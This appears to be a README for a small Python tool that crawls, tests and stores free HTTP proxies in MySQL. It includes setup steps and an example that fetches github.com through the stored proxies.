A tiny tool for crawling, assessing, and storing useful proxies.
Install the Python dependencies (a running MySQL server is also required):
pip install pymysql requests
Modify the database connection information in the project's configuration file.
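The exact layout of the configuration file isn't shown here; as a sketch, pymysql connection settings typically look something like the following (every name and value below is an assumption, not the project's actual config):

```python
# Hypothetical pymysql connection settings; match these to your own
# MySQL server and to whatever names the project's config file uses.
DB_CONFIG = {
    'host': '127.0.0.1',
    'port': 3306,
    'user': 'root',
    'password': 'your_password',
    'db': 'proxy',
    'charset': 'utf8mb4',
}

# A connection would then be opened with: pymysql.connect(**DB_CONFIG)
```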
# crawl, assess and store proxies
python <crawler script>
# periodically re-assess the quality of proxies already in the db
python <assessment script>

Please first construct your IP pool before using it.
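How the tool assesses proxy quality isn't shown above; a minimal sketch of one plausible check follows (the function name, test URL, and success criterion are my assumptions, not the project's API):

```python
import requests

def check_proxy(ip_port, test_url='http://httpbin.org/ip', timeout=4):
    """Return True if a request through the proxy succeeds within `timeout`."""
    proxy = {'http': 'http://' + ip_port}
    try:
        r = requests.get(test_url, proxies=proxy, timeout=timeout)
        return r.status_code == 200
    except requests.RequestException:
        return False

# A periodic assessor could loop over the stored proxies, call
# check_proxy on each, and delete the rows that fail.
```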
Example: crawl GitHub homepage data through the pool:
import pymysql
import requests

# connection details are illustrative; use the values from your config
conn = pymysql.connect(host='127.0.0.1', user='root',
                       password='your_password', db='proxy')
cursor = conn.cursor()
table_name = 'proxies'  # hypothetical table name

# visit the database to get all proxies
ip_list = []
try:
    cursor.execute('SELECT content FROM %s' % table_name)
    result = cursor.fetchall()
    for i in result:
        ip_list.append(i[0])
except Exception as e:
    print(e)
finally:
    cursor.close()
    conn.close()

# use these proxies to crawl the website
for i in ip_list:
    proxy = {'http': 'http://' + i}
    url = 'https://github.com'
    try:
        r = requests.get(url, proxies=proxy, timeout=4)
        print(r.status_code)
    except requests.RequestException as e:
        print(e)

More details are in the source code.